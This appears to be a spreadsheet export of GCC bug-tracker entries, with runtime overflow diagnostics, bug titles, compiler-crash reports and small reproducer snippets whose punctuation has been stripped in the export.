ira-color.c:1508:29: runtime error: signed integer overflow: -16383750 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -16383750 * 250 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -17664042 * 500 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -17664042 * 500 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -19958478 * 219 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -20479687 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -20659906 * 194 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -20971200 * 320 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -22908412 * 127 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -230460334 * 19 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -230460334 * 19 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -262140400 * 125 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -262140400 * 125 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -263662610 * 52 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -26473766 * 129 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -26698580 * 250 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -28163857 * 191 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -4095937 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -4095937 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -57072202 * 311 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -65535000 * 61 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -7659400 * 394 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -8847224 * 270 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -8847224 * 270 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -8847224 * 270 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -8847224 * 270 cannot be represented in type 'int'
postreload.c:1770:24: runtime error: signed integer overflow: 0 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 0 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 0 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 0 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 11 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 20 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 20 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 7378697629483820646 - -1844674407370955162 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: -8446744073709551617 - 999999999999999999 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 8646911284551352320 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -281474976710656 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -281474976710656 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223090561878065153 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9223372036854775807 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: -9223372036854775808 - 8935141660703064064 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: -9223372036854775808 - 8935141660703064064 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: -9223372036854775808 - 9223372036854775807 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 999999999999999 - -9223372036854775808 cannot be represented in type 'long int'
postreload.c:1770:24: runtime error: signed integer overflow: 9999999999999999 - -9223372036854775808 cannot be represented in type 'long int'
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:1650:16: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
simplify-rtx.c:4124:23: runtime error: signed integer overflow: 1844674407370955161 - -9223372036854775808 cannot be represented in type 'long int'
simplify-rtx.c:4124:23: runtime error: signed integer overflow: -9223372036854775808 - 1 cannot be represented in type 'long int'
simplify-rtx.c:4124:23: runtime error: signed integer overflow: -9223372036854775808 - 1 cannot be represented in type 'long int'
stor-layout.c:2529:13: runtime error: signed integer overflow: -9223372036854775808 + -1 cannot be represented in type 'long int'</t>
  </si>
  <si>
    <t>GCC-42218</t>
  </si>
  <si>
    <t>[4.5 Regression] Broken diagnostic: 'tree_vec' not supported by pp_c_expression</t>
  </si>
  <si>
    <t>A broken diagnostic is issued for the following invalid code snippet on trunk:
================================
template struct A
{
  template struct B
}
int i = A::B::X::Y
================================
bug.cc:6:21: error: 'A::B::X' has not been declared
GCC 4.3.x and 4.4.x issue a sensible error message:
bug.cc:6: error: 'A::B::X' has not been declared
GCC 4.2.x issues an even better error message:
bug.cc:6: error: 'struct A::B::X' has not been declared</t>
  </si>
  <si>
    <t>GCC-56144</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in get_reload_reg at lra-constraints.c:421</t>
  </si>
  <si>
    <t>regehr@home:~/z/reduce/r200$ gcc -O small.c
small.c: In function â€˜mainâ€™:
small.c:43:1: internal compiler error: in get_reload_reg at lra-constraints.c:421
 }
 ^
0x7f66a2 get_reload_reg
	/home/regehr/z/compiler-source/gcc/gcc/lra-constraints.c:421
0x7f6838 process_addr_reg
	/home/regehr/z/compiler-source/gcc/gcc/lra-constraints.c:1106
0x7f6b94 process_address
	/home/regehr/z/compiler-source/gcc/gcc/lra-constraints.c:2360
0x7f977f curr_insn_transform
	/home/regehr/z/compiler-source/gcc/gcc/lra-constraints.c:2720
0x7fbe04 lra_constraints(bool)
	/home/regehr/z/compiler-source/gcc/gcc/lra-constraints.c:3554
0x7eeeae lra(_IO_FILE*)
	/home/regehr/z/compiler-source/gcc/gcc/lra.c:2279
0x7b7218 do_reload
	/home/regehr/z/compiler-source/gcc/gcc/ira.c:4623
0x7b7218 rest_of_handle_reload
	/home/regehr/z/compiler-source/gcc/gcc/ira.c:4736
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
regehr@home:~/z/reduce/r200$ cat small.c
int a
union U0
{
  volatile unsigned f2
  volatile unsigned f4
}
volatile b
static union U0 c
volatile unsigned d f
volatile e
volatile g
volatile h
volatile i
volatile j
volatile k
volatile l
volatile m
volatile n
volatile o
volatile p
main ()
{
  a = b
  a += c.f2
  a += c.f4
  unsigned q = h
  a += q
  q = g
  a += q
  a += f
  q = e
  a += q
  a += d
  a += 2L
  a += j
  a += i
  a += k
  a += p
  a += o
  a += n
  a += m
  a += l
}
regehr@home:~/z/reduce/r200$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r195565-install/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r195565-install --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20130129 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-36907</t>
  </si>
  <si>
    <t>[4.4 Regression]: Gcc failed to bootstrap</t>
  </si>
  <si>
    <t>Gcc 4.4 revision 138076 failed to boot strap on Linux/ia64:
/export/gnu/import/svn/gcc-test/bld/./prev-gcc/xgcc -B/export/gnu/import/svn/gcc-test/bld/./prev-gcc/ -B/usr/local/ia64-unknown-linux-gnu/bin/ -c  -DUSE_LIBUNWIND_EXCEPTIONS -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros                                   -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I../../src/gcc -I../../src/gcc/build -I../../src/gcc/../include -I../../src/gcc/../libcpp/include  -I../../src/gcc/../libdecnumber -I../../src/gcc/../libdecnumber/dpd -I../libdecnumber  -o build/errors.o ../../src/gcc/errors.c
../../src/gcc/errors.c: In function 'trim_filename':
../../src/gcc/errors.c:124: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [build/errors.o] Error 1
make[5]: *** Waiting for unfinished jobs....
Revision 138073 is OK. I think revision 138075:
http://gcc.gnu.org/ml/gcc-cvs/2008-07/msg00785.html
is the cause.</t>
  </si>
  <si>
    <t>GCC-60221</t>
  </si>
  <si>
    <t>[4.7 Regression] gcc -fexceptions generates unnecessary cleanup code</t>
  </si>
  <si>
    <t>&gt; gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/tmp/gcc-4.8.2/libexec/gcc/x86_64-unknown-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.8.2/configure --prefix=/tmp/gcc-4.8.2 --enable-languages=cc++
Thread model: posix
gcc version 4.8.2 (GCC)
&gt; cat test.c
void bar(void)
void foo(void)
{
  struct { int x } y
  bar()
}
When compiled with `gcc -fexceptions -O0 -c test.c` the above code generates cleanup code for stack unwinding purposes referencing __gcc_personality_v0 this necessitates linking with shared-libgcc.
I am not sure this is really a bug but versions of gcc older than 4.7 do not generate cleanup code for this example neither does gcc 4.8 when the local variable is replaced by `int y`. Moreover according to the gcc documentation there are several situations (I have been unable to find more a detailed specification) in which linking with shared-libgcc is necessary which includes code throwing or catching exceptions but should -- as far as I can see -- *not* include c code just passing through exceptions.
Tested on x86_64-unknown-linux-gnu x86_64-unknown-linux-gnu -m32 and i386-pc-solaris2.11 using gcc 4.7.1 4.7.3 and 4.8.2. gcc 4.6.4 and earlier tested versions are not affected. I have been unable to test gcc 4.7.0.</t>
  </si>
  <si>
    <t>redlizard</t>
  </si>
  <si>
    <t>GCC-19835</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] [AVR] Loop variable gets widened to LONG instead of int</t>
  </si>
  <si>
    <t>GNU C version 4.0.0 20041205 (experimental) (avr)
Loop variable gets widened to LONG instead of unsigned int (or perhaps even
int). Seems we forgeot how big the target is?
Testcase:
struct S19 { unsigned char i[19] }
void						
init (struct S19 *p int i)			
{						
  int j					
  for (j = 0 j &lt; 19 j++)			
    p-&gt;i[j] = i + j				
}	
tree dump:
 Function init (init)
init (p i)
{
  long unsigned int ivtmp.3
:
  ivtmp.3 = 0
:
  ((unsigned char *) ivtmp.3 + &amp;p-&gt;i[0])-&gt;i[0] = (unsigned char) ivtmp.3 +
(unsigned char) (signed char) i
  ivtmp.3 = ivtmp.3 + 1
  if (ivtmp.3 != 19) goto  else goto 
:
  return
}
Not surprisingly backend code reflects long (SImode) decrement and compare :
/* prologue: frame size=0 */
/* prologue end (size=0) */
	movw r26r24
	ldi r18lo8(0)
	ldi r19hi8(0)
	ldi r20hlo8(0)
	ldi r21hhi8(0)
.L2:
	movw r30r26
	add r30r18
	adc r31r19
	mov r24r18
	add r24r22
	st Zr24
	subi r18lo8(-(1))
	sbci r19hi8(-(1))
	sbci r20hlo8(-(1))
	sbci r21hhi8(-(1))
	cpi r18lo8(19)
	cpc r19__zero_reg__
	cpc r20__zero_reg__
	cpc r21__zero_reg__
	brne .L2
/* epilogue: frame size=0 */
	ret</t>
  </si>
  <si>
    <t>GCC-70338</t>
  </si>
  <si>
    <t>[5 Regression] ICE combining debug symbols range-for in lambda in function template accessing captured variable-size array</t>
  </si>
  <si>
    <t>Created attachment 38045
testcase
The testcase in attachment causes a segfault with 5.3.1 only when compiled with -g(gdb) or -g(gdb)2 or -g(gdb)3. It appears that some debug symbol generation cannot handle a complex interaction between template functions variable-length arrays and range-for. I have included in the test case examples of functions that do not crash taking out some of the elements that put together cause the ICE.</t>
  </si>
  <si>
    <t>GCC-3053</t>
  </si>
  <si>
    <t>crash on armlinux and conditional execution</t>
  </si>
  <si>
    <t>There is bug in condition reversal versus conditional execution we was speaking about with Richard but the discussion has faded.
Just to keep the problem mentioned somewhere
Release:
3.0
Environment:
3.0 armlinux
How-To-Repeat:
Compile the attached testcase with optimization</t>
  </si>
  <si>
    <t>GCC-1747</t>
  </si>
  <si>
    <t>cvs bootstrap fails</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi!
 I seem to be getting this error when after I run configure 
 --prefix=/opt/gcc and then make bootstrap on the latest CVS versions of 
 gcc lately.
 It seems that not all of the files are either copied or generated in the 
 ./i386-unknown-linux-gnu subdirectory (copying the missing file there 
 results in more errors of more missing configuration files).
 Can anyone please tell me how to overcome that?
 Thanks
   Sefer.
 headers.cc		..linked
 lib		..working in
 libstdc++.exp		..linked
 libstdc++.tests		..working in
 tests.exp		..linked
 printnow.c		..linked
 loading cache ../config.cache
 configure: error: can not find install-sh or install.sh in .. ./..
 make[1]: *** [configure-target-libstdc++-v3] Error 1
 make[1]: Leaving directory `/tmp/egcs'
 make: *** [bootstrap] Error 2
 [me@mybox] /tmp/egcs &gt;
 _________________________________________________________________________
 Get Your Private Free E-mail from MSN Hotmail at http://www.hotmail.com.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-40154</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] internal compiler error: in do_SUBST at combine.c:681</t>
  </si>
  <si>
    <t>ryan@ryan:~/gcc/trunk/gcc/build/gcc$ ./xgcc -v
Using built-in specs.
Target: sh4-unknown-linux-gnu
Configured with: ../configure --build=i486-build_pc-linux-gnu --host=i486-build_pc-linux-gnu --target=sh4-unknown-linux-gnu --prefix=/home/ryan/crosstool-ng-1.3.1/targets/sh4-unknown-linux-gnu/build/gcc-core-static --with-local-prefix=/home/ryan/x-tools/sh4-unknown-linux-gnu/sh4-unknown-linux-gnu/sys-root --disable-multilib --with-sysroot=/home/ryan/x-tools/sh4-unknown-linux-gnu/sh4-unknown-linux-gnu/sys-root --with-newlib --enable-threads=no --disable-shared --enable-__cxa_atexit --disable-nls --enable-symvers=gnu --enable-languages=c --enable-target-optspace
Thread model: single
gcc version 4.5.0 20090515 (experimental) [trunk revision 147550] (GCC)
$ cat ~/ice.i
char buf[20]
int main() {
        long long int t = 50
        strcpy(buf hello world)
        t *= 1000000000
        for()
            foo(
}
ryan@ryan:~/gcc/trunk/gcc/build/gcc$ ./xgcc -B. -O ~/ice.i
/home/ryan/ice.i: In function 'main':
/home/ryan/ice.i:5: warning: incompatible implicit declaration of built-in function 'strcpy'
/home/ryan/ice.i:9: internal compiler error: in do_SUBST at combine.c:681
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Works in gcc 4.3.3. Fails in gcc 4.4.0 and trunk (4.5.0 20090515)</t>
  </si>
  <si>
    <t>GCC-62</t>
  </si>
  <si>
    <t>nested classes of surrounding class not visible</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Mon 03 Jan 2000 23:03:01 -0800
 Dear gcc maintainers
 The following bug that crept in sometime after 2.8.1 has existed in all
 2.95  versions so far:
 41[linux1:]~/src/test&gt; cat namescope.cxx
 class A {
 public:
	 class B
	 class C
 }
 class A::B {
 }
 class A::C {
	 class D
 }
 class A::C::D {
 public:
	 B* foo()         //   gcc-2.95.*  fails to see that A::B  is
 declared in this context
 }
 42[linux1:]~/src/test&gt; /usr/local/gcc-2.95.2/bin/g++ -v namescope.cxx
 Reading specs from
 /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
  /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cpp
 -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus
 -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__
 -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS
 -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686
 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__
 namescope.cxx /tmp/cc84JpBr.ii
 GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
  /usr/local/include
  /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/include
  /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search
 path:
 End of omitted list.
  /usr/local/gcc-2.95.2/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cc1plus
 /tmp/cc84JpBr.ii -quiet -dumpbase namescope.cc -version -o
 /tmp/ccwNSPZI.s
 GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled
 by GNU C version 2.95.2 19991024 (release).
 namescope.cxx:16: syntax error before `*'
 43[linux1:]~/src/test&gt;
 -Raymond
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-30777</t>
  </si>
  <si>
    <t>testsuite/gcc.target/i386/abi-1.c failure on openSolaris</t>
  </si>
  <si>
    <t>FAIL: gcc.target/i386/abi-1.c scan-assembler xmm0
Not certain if this is a code generation problem or a
test suite problem.
The generated code does not use mmx/sse registers.
verbose output:
/opt/gnu.org/gcc-4.1/bin/gcc abi-1.c -v -O1 -msse -mno-sse2 -S -o abi-1.s
Using built-in specs.
Target: i686-pc-solaris2.11
Configured with: ../../gcc/configure --prefix=/opt/gnu.org/gcc-4.1 --with-gnu-as --with-as=/opt/gnu.org/gcc-4.1/bin/as --without-gnu-ld --with-ld=/usr/ccs/bin/ld --enable-shared --disable-multilib --enable-languages=c --with-mpfr=/opt/gnu.org/gcc-4.1 --with-gmp=/opt/gnu.org/gcc-4.1 i686-pc-solaris2.11
Thread model: posix
gcc version 4.1.2 20070211 (prerelease)
built on openSolaris (Build 54)
binutils version 2.17
gmp version 4.5.1
mpfr version 2.2.1
generated code:
        .file   abi-1.c
        .text
.globl foo
        .type   foo @function
foo:
        movl    4(%esp) %eax
        movl    $0 (%eax)
        movl    $1072693248 4(%eax)
        movl    $0 8(%eax)
        movl    $1073741824 12(%eax)
        ret     $4
        .size   foo .-foo
        .ident  GCC: (GNU) 4.1.2 20070211 (prerelease)</t>
  </si>
  <si>
    <t>GCC-1906</t>
  </si>
  <si>
    <t>difference between gcj and jdk for MessageFormat</t>
  </si>
  <si>
    <t>The following code
import java.text.MessageFormat
public class Test {
    public static void main(String args[]) {
        MessageFormat messageformat = new MessageFormat(test Message = {0})
        Object aobj[] = new Object[1]
        aobj[0] = new String(a jolly string)
        System.out.println(messageformat.format((Object) aobj))
    }
}
produces different results when compiled with gcj than it
does if run in either Sun's (1.2) or IBM's (1.3) JDK
$ javac Test.java
$ java Test 
test Message a jolly string
$ gcj Test.java --main=Test -o test
$ ./test
test Message [Ljava.lang.Object@807dfc0
Release:
gcc version 2.97 20010206 (experimental)
Environment:
Linux RedHat 7 x86</t>
  </si>
  <si>
    <t>GCC-14808</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] [win32] Undefined results with virtual base classes</t>
  </si>
  <si>
    <t>With both 3.4.0 (20040327) and trunk (20040331) I am getting segfaults
or unexpected results with virtual base classes on i386-pc-mingw32
Here is an illustration:
// vbase.cc
#include 
class Base
{
public:
 // int base_var
  virtual char* vf() const = 0
  virtual ~Base() {}
}
class D1 :  public Base
{
public:
  char* vf() const { return D1 }
}
class D2 :  virtual public Base
{
public:
  char* vf() const { return D2 }
}
void test1()
{
  Base* b1 = new D1
  printf(%s\n b1-&gt;vf())
}
void test2()
{
  Base* b2 = new D2
  printf(%s\n b2-&gt;vf())
}
int main()
{
 test1()
 test2()
 return 0
}
//end vbase.cc
With trunk:
When compiled without optimisation
g++ -ovbase0 -Wall -O0 vbase.cc
I get successful build with no warnings. But executing vbase0 causes
segfault.
Ditto with -O1
When compiled with -O2 optimisation
g++ -ovbase2 -Wall -O2 vbase.cc
executing vbase2 outputs:
D1
2D2
When I add -g:
g++ -ovbase0g -g -Wall -O0 vbase.cc
Executing vbase0g doesn't segfault. But it doesn't produce _any_ 
output either.  Ditto with -O1 -g.
This is regression from 3.3.3 which output 
D1
D2
at all levels of optimisation
2.95.3 also produced the correct output.
If I add a variable (the commented out int base_var) to the
base class the executable built with 3.4.0 and trunk executes
without problem and produces the correct output.
If I comment out the virtual keyword in D2's definition I 
also get correct output with 3.4.0 and trunk.
Danny</t>
  </si>
  <si>
    <t>GCC-37389</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] expected integer_cst have error_mark in build_enumerator</t>
  </si>
  <si>
    <t>seen with 4.2.4 4.3.2 and trunk 20080904
g++ -c -mtune=generic -g foo.ii
In file included from utNativePackedCoDec.cc:5:
../../src/pers/RecBuf.hh: At global scope:
../../src/pers/RecBuf.hh: In instantiation of 'pers::RecBuf':
utNativePackedCoDec.cc:11:   instantiated from here
../../src/pers/RecBuf.hh:76: error: 'typename pers::NativePackedCoDec::Type' names 'template struct pers::NativePackedCoDec::Type' which is not a type
../../src/pers/RecBuf.hh:76: error: overflow in enumeration values at 'STRING_SZ'
../../src/pers/RecBuf.hh:76: error: 'typename pers::NativePackedCoDec::Type' names 'template struct pers::NativePackedCoDec::Type' which is not a type
../../src/pers/RecBuf.hh:76: internal compiler error: tree check: expected integer_cst have error_mark in build_enumerator at cp/decl.c:11144
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-1595</t>
  </si>
  <si>
    <t>g++ reports internal error instead of code error</t>
  </si>
  <si>
    <t xml:space="preserve">  stam.cc: In function `int main()':
            stam.cc:5: Internal compiler error.
            stam.cc:5: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
            stam.cc:5: See  for details.
            Exit 1
Release:
gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
How-To-Repeat:
      #include 
            main () {
            list  l
            int
            }</t>
  </si>
  <si>
    <t>danbr</t>
  </si>
  <si>
    <t>GCC-54818</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] error: type mismatch in binary expression</t>
  </si>
  <si>
    <t>Created attachment 28360
Sample file that gfortran can't compile
PGI can compile the attached file:
    $ pgf90 --version
    pgf90 12.5-0 64-bit target on x86-64 Linux -tp istanbul 
    Copyright 1989-2000 The Portland Group Inc.  All Rights Reserved.
    Copyright 2000-2012 STMicroelectronics Inc.  All Rights Reserved.
    $ pgf90 -c broken.f
GCC cannot:
    $ gfortran --version
    GNU Fortran (GCC) 4.7.1
    Copyright (C) 2012 Free Software Foundation Inc.
    GNU Fortran comes with NO WARRANTY to the extent permitted by law.
    You may redistribute copies of GNU Fortran
    under the terms of the GNU General Public License.
    For more information about these matters see the file named COPYING
    $ gfortran -c broken.f
    broken.f: In function â€˜brokenâ€™:
    broken.f:1:0: error: type mismatch in binary expression
    integer(kind=8)
    integer(kind=8)
    integer(kind=4)
    D.1918 = D.1867 + 8
    broken.f:1:0: error: type mismatch in binary expression
    integer(kind=8)
    integer(kind=8)
    integer(kind=4)
    D.1922 = D.1867 + 8
    broken.f:1: confused by earlier errors bailing out</t>
  </si>
  <si>
    <t>scott+gcc+bugzilla</t>
  </si>
  <si>
    <t>GCC-42289</t>
  </si>
  <si>
    <t>[4.3 only] libffi fails to build with binutils-2.20 on ARM</t>
  </si>
  <si>
    <t>This is the error reported:
libtool: compile:  /var/tmp/cross/arm-carel-linux-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/build/./gcc/xgcc -B/var/tmp/cross/arm-carel-linux-gnu/portag
e/cross-arm-carel-linux-gnu/gcc-4.3.4/work/build/./gcc/ -B/usr/arm-carel-linux-gnu/bin/ -B/usr/arm-carel-linux-gnu/lib/ -isystem /usr/arm-carel-linux-gnu/include -
isystem /usr/arm-carel-linux-gnu/sys-include -I. -I/var/tmp/cross/arm-carel-linux-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/gcc-4.3.4/libffi/include -Ii
nclude -I/var/tmp/cross/arm-carel-linux-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/gcc-4.3.4/libffi/src -O2 -g -O2 -pipe -c /var/tmp/cross/arm-carel-linu
x-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/gcc-4.3.4/libffi/src/arm/sysv.S  -fPIC -DPIC -o src/arm/.libs/sysv.o
/var/tmp/cross/arm-carel-linux-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/gcc-4.3.4/libffi/src/arm/sysv.S: Assembler messages:
/var/tmp/cross/arm-carel-linux-gnu/portage/cross-arm-carel-linux-gnu/gcc-4.3.4/work/gcc-4.3.4/libffi/src/arm/sysv.S:238: Error: missing .fnstart before unwinding directive
The problem is that at line 238 there is a .pad directive without an UNWIND prefix (which is expanded to @ in my case which means it all gets commented out).
I'm attaching a patch to fix this.</t>
  </si>
  <si>
    <t>GCC-17138</t>
  </si>
  <si>
    <t>[lno] ICE in peel_address at tree-ssa-loop-ivopts.c:2854</t>
  </si>
  <si>
    <t>#include 
bool complexEigenvalues(const double a[][3]) { return true }
void printEigenvalues(const double a[][3]) {
    if (complexEigenvalues(a)) {}
    std::complex e[3]
}
Configured with: /esat/alexandria1/stefaan/src/lno/gcc/configure
--prefix=/esat/olympia/install --program-suffix=-lno --enable-languages=cc++
Thread model: posix
gcc version 3.5-tree-ssa-lno 20040822 (merged 20040718)
 /esat/olympia/install/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/cc1plus
-quiet -v -D_GNU_SOURCE matrix3x3.cpp -quiet -dumpbase matrix3x3.cpp
-mtune=pentiumpro -auxbase-strip test.o -O1 -version -o /tmp/ccsidh43.s
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory
/esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
